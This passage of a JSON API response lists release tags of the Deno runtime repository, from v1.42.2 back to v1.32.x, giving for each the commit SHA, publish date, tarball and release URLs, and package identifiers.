manifests"},{"name":"v1.42.2","sha":"04c0a4cbf7c00811d3ace3184c1cb8597a0e88f1","kind":"commit","published_at":"2024-04-11T06:39:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2/manifests"},{"name":"v1.42.1","sha":"08f0613b390b289d07c6ea165bed0518809b34e8","kind":"commit","published_at":"2024-04-01T06:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1/manifests"},{"name":"v1.42.0","sha":"9c6eca1064de029e560377bef831e69d22c5c00b","kind":"commit","published_at":"2024-03-28T00:47:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0/manifests"},{"name":"v1.41.3","sha":"0d7662e1556a60bcc4b7075752fb2c2842b1afea","kind":"commit","published_at":"2024-03-14T18:13:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3/manifests"},{"name":"v1.41.2","sha":"6d062cf0c79158a8c0c8a136c945c3eab2af8b50","kind":"commit","published_at":"2024-03-08T07:32:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2/manifests"},{"name":"v1.41.1","sha":"8ccb9e954548d1a4d3ccbe065c28d6067d3fda03","kind":"commit","published_at":"2024-03-01T00:25:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1/manifests"},{"name":"v1.41.0","sha":"118445103b019fbeb50eadc8d09d450fa8c33eee","kind":"commit","published_at":"2024-02-22T01:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0/manifests"},{"name":"v1.40.5","sha":"2c97831fec0d335a474c4a599a5df345a23ef036","kind":"commit","published_at":"2024-02-15T05:22:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5/manifests"},{"name":"v1.40.4","sha":"49214d309fc373a80a02f57545131b15f7813a98","kind":"commit","published_at":"2024-02-08T11:05:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4/manifests"},{"name":"v1.40.3","sha":"887fd59486325ad99c183955b35fec07fd45516c","kind":"commit","published_at":"2024-02-01T06:27:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3/manifests"},{"name":"v1.40.2","sha":"9a55a72cf195b2d5cee1e8598c7d28e4b1e8013a","kind":"commit","published_at":"2024-01-26T16:36:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2/manifests"},{"name":"v1.40.1","sha":"b003ecec64782ebe3aa7e5b17728df2e6a6e2e39","kind":"commit","published_at":"2024-01-25T15:22:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1/manifests"},{"name":"v1.40.0","sha":"9e575a286269c38c1af0a918a2a4ea4639a3004b","kind":"commit","published_at":"2024-01-25T02:48:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0/manifests"},{"name":"v1.39.4","sha":"be4d0b7ad306312b0c01e1abc345e54b4e589ab6","kind":"commit","published_at":"2024-01-13T23:52:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4/manifests"},{"name":"v1.39.3","sha":"aa23ccd1ae3b0c188336c0fd1d84deaed5fe13af","kind":"commit","published_at":"2024-01-12T14:58:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3/manifests"},{"name":"v1.39.2","sha":"6af25c0592af46781b63bd43cf12d39b8aa61d09","kind":"commit","published_at":"2024-01-04T20:40:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2/manifests"},{"name":"v1.39.1","sha":"68254ddc2060c32e6daa55aa3b33f82739655705","kind":"commit","published_at":"2023-12-21T15:46:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1/manifests"},{"name":"v1.39.0","sha":"5b96f7bf21392620f0047687ec3b75b25b7ea9f2","kind":"commit","published_at":"2023-12-13T21:52:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0/manifests"},{"name":"v1.38.5","sha":"172e5f0a0cea97ba27f7f6e46fb8f9b31f8dbbc6","kind":"commit","published_at":"2023-12-05T22:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5/manifests"},{"name":"v1.38.4","sha":"8c07f52a7cbd6117e968383c94fe25b91c4c9242","kind":"commit","published_at":"2023-11-30T19:12:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4/manifests"},{"name":"v1.38.3","sha":"3193e93912f87dd05871abb61f54297368f3f265","kind":"commit","published_at":"2023-11-24T03:49:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3/manifests"},{"name":"v1.38.2","sha":"118be11e8c64fd6c4afb352b5095c02fa5571e8e","kind":"commit","published_at":"2023-11-17T05:57:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2/manifests"},{"name":"v1.38.1","sha":"0e7ad0388be7413db6ded8b60d5ae5d7cc0ffda0","kind":"commit","published_at":"2023-11-10T11:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1/manifests"},{"name":"v1.38.0","sha":"41877a0b3735d52db8b4f5047b1d4d61e37ba585","kind":"commit","published_at":"2023-11-02T01:01:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0/manifests"},{"name":"v1.37.2","sha":"7282994df4f9c1748affa7c4455eea46a9e1a2e0","kind":"commit","published_at":"2023-10-13T00:14:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2/manifests"},{"name":"v1.37.1","sha":"72c276d61a8b43abd3dbcf4f1440a2bf133fe0d2","kind":"commit","published_at":"2023-09-27T06:24:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1/manifests"},{"name":"v1.37.0","sha":"997aa604dfd50c0f0ec6fd4db16b5034d2cfd726","kind":"commit","published_at":"2023-09-19T20:29:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0/manifests"},{"name":"v1.36.4","sha":"c0617d11f6391f1b1b3afffe0152c73b5989ab80","kind":"commit","published_at":"2023-09-01T14:15:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4/manifests"},{"name":"v1.36.3","sha":"55029c72618323014aa49317de9124375adeb13f","kind":"commit","published_at":"2023-08-24T16:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3/manifests"},{"name":"v1.36.2","sha":"a7f5244a72cc6c00949c02a180d0d9cdf2bf1672","kind":"commit","published_at":"2023-08-21T13:39:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2/manifests"},{"name":"v1.36.1","sha":"9f1455b75087e9e41a995bbb6a8a7f3059a0185a","kind":"commit","published_at":"2023-08-10T10:53:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1/manifests"},{"name":"v1.36.0","sha":"6ba245fe2570b29e35a4fd296a196a58870b1e3c","kind":"commit","published_at":"2023-08-03T16:26:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0/manifests"},{"name":"v1.35.3","sha":"2e7254f2a60239603a2c6fea75cc71fbf6226470","kind":"commit","published_at":"2023-07-26T14:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3/manifests"},{"name":"v1.35.2","sha":"60fe8aa5325345fc07c997b2dba169e45b87a863","kind":"commit","published_at":"2023-07-20T01:29:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2/manifests"},{"name":"v1.35.1","sha":"b4824bf45f3d12e1b53e7eb5afcd49c38a575210","kind":"commit","published_at":"2023-07-12T21:49:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1/manifests"},{"name":"v1.35.0","sha":"1ac5fddf54a828f1372e1ff10559d1a4bc70e5c9","kind":"commit","published_at":"2023-07-04T23:58:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0/manifests"},{"name":"v1.34.3","sha":"ef24d1a0b7fb7f3297cbda1d80df6e1f72bef252","kind":"commit","published_at":"2023-06-15T22:16:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3/manifests"},{"name":"v1.34.2","sha":"acf5d44a221b84e92bd0f6b1be5e6b08fcfb5a32","kind":"commit","published_at":"2023-06-09T00:13:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2/manifests"},{"name":"v1.34.1","sha":"ea6cd3f1fccd5a621582788a4949d40d5fcdcd1b","kind":"commit","published_at":"2023-05-29T23:30:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1/manifests"},{"name":"v1.34.0","sha":"935071dd0e233a55c93ca4792f9210f0ea6bccc6","kind":"commit","published_at":"2023-05-24T23:38:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0/manifests"},{"name":"v1.33.4","sha":"5be97b7584c712848336da90077db86fe4859d96","kind":"commit","published_at":"2023-05-18T16:21:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4/manifests"},{"name":"v1.33.3","sha":"12ba2d311bb6cce7c1bf2567748987e91585d540","kind":"commit","published_at":"2023-05-12T11:06:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3/manifests"},{"name":"v1.33.2","sha":"c2a61a4192609615beba363f5606e6e04ae60c97","kind":"commit","published_at":"2023-05-04T14:39:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2/manifests"},{"name":"v1.33.1","sha":"d5f52ef7ac20cb116fad574e3017f194124be312","kind":"commit","published_at":"2023-04-28T17:05:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1/manifests"},{"name":"v1.33.0","sha":"39ece1fe0ddacc2cbf182403c9e7085bc01df5a6","kind":"commit","published_at":"2023-04-27T23:18:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0/manifests"},{"name":"v1.32.5","sha":"6cfca9b33eb0647fc73ddfc20349ae9fb943d01a","kind":"commit","published_at":"2023-04-18T18:31:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5/manifests"},{"name":"v1.32.4","sha":"709cfd6d91d335c16337be9339d45250e02ae247","kind":"commit","published_at":"2023-04-12T15:17:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4/manifests"},{"name":"v1.32.3","sha":"73d472149ce6dd360a71ca5d1819d3f8f27754f8","kind":"commit","published_at":"2023-04-01T22:51:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3/manifests"},{"name":"v1.32.2","sha":"24e0b31096682f0e